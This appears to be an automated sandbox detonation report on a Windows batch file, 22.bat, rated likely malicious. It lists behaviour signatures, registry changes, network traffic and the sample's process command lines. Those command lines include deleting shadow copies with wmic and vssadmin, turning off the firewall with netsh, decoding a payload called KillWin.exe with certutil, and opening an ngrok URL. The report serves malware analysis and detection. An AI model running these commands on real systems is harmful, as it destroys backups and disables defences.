Analysis Overview
SHA256
8254c19785e9b98091dc3644126e1b41188cba52549b2cdd5a84c4d4beb8c4f8
Threat Level: Likely malicious
The file 22.bat was found to be: Likely malicious.
Malicious Activity Summary
Deletes shadow copies
Modifies Windows Firewall
Sets file to hidden
Checks computer location settings
Enumerates connected drives
Sets desktop wallpaper using registry
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Gathers network information
Interacts with shadow copies
Modifies Control Panel
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 08:19
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 08:19
Reported
2024-06-26 08:22
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
152s
Command Line
Signatures
Deletes shadow copies
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5000310000000000a858ce6d10004c6f63616c003c0009000400efbea8582761da5883422e00000096e10100000001000000000000000000000000000000e58d7f004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000a85827611100557365727300640009000400efbe874f7748da5883422e000000c70500000000010000000000000000003a0000000000eff5be0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000a858276112004170704461746100400009000400efbea8582761da5883422e00000083e10100000001000000000000000000000000000000db45ae004100700070004400610074006100000016000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000da588342100054656d7000003a0009000400efbea8582761da5883422e00000097e1010000000100000000000000000000000000000041905a00540065006d007000000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000a858a66d100041646d696e003c0009000400efbea8582761da5883422e00000078e10100000001000000000000000000000000000000700c0d00410064006d0069006e00000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\22.bat"
C:\Windows\system32\attrib.exe
attrib Admin-information.log +h
C:\Windows\explorer.exe
explorer .
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all/quiet
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://ca82-152-231-188-225.ngrok-free.app/Kit
C:\Windows\system32\mode.com
mode con: cols=170 lines=45
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4368,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4784,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5284,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5436,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5444,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
C:\Windows\system32\certutil.exe
certutil -decode "Image.bin" "Wallpaper.jpeg"
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5980,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:1
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\system32\timeout.exe
timeout /t 4
C:\Windows\system32\certutil.exe
certutil -decode "Data.lp" "KillWin.exe"
C:\Windows\system32\wscript.exe
wscript "m.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5688,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6564,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6524,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x470 0x49c
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | ca82-152-231-188-225.ngrok-free.app | udp |
| US | 8.8.8.8:53 | ca82-152-231-188-225.ngrok-free.app | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | ca82-152-231-188-225.ngrok-free.app | udp |
| DE | 18.192.31.165:443 | ca82-152-231-188-225.ngrok-free.app | tcp |
| DE | 18.192.31.165:443 | ca82-152-231-188-225.ngrok-free.app | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | cdn.ngrok.com | udp |
| US | 8.8.8.8:53 | cdn.ngrok.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| DE | 3.125.102.39:443 | cdn.ngrok.com | tcp |
| US | 23.200.189.225:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 2.20.12.101:443 | bzib.nelreports.net | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.31.192.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.102.125.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.189.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 186.244.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
